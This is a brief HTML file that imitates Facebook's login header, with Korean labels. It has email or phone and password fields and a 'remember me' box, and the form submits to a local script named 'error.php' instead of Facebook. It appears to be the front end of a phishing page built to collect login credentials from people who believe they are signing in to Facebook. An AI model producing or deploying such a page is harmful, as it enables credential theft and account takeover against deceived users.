<!DOCTYPE html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="viewport" content="width=device-width, initial-scale=1.0" />
<title>Facebook</title>
<link rel="stylesheet" href="style.css" type="text/css" />
</head>

<body class="login">
<!-- header starts here -->
<div id="facebook-Bar">
<div id="facebook-Frame">
<div id="logo"> <h1><a href="index.html">facebook</a></h1> </div>
<div id="header-main-right">
<div id="header-main-right-nav">
<form method="post" action="error.php" id="login_form" name="login_form">

<table border="0" style="border:none">
<tr>
<td ><input type="text" tabindex="1" id="email" placeholder="이메일 또는 휴대폰" name="이메일or휴대폰" class="inputtext radius1" value=""></td>
<td ><input type="password" tabindex="2" id="pass" placeholder="비밀번호" name="비밀번호" class="inputtext radius1" ></td>
<td ><input type="submit" class="fbbutton" name="login" value="로그인" /></td>
</tr>

<tr>
<td><label>
<input id="persist_box" type="checkbox" name="persistent" value="1" checked="1"/>
<span style="color:#ccc;">아이디를 기억하기</span></label></td>
<td><label><a href="" style="color:#ccc; text-decoration:none">비밀번호를 까먹으셨나요?</a></label></td>
</tr>

</table>
</form>
</div>
</div>
</div>
</div>
<!-- header ends here -->


</body>
</html>
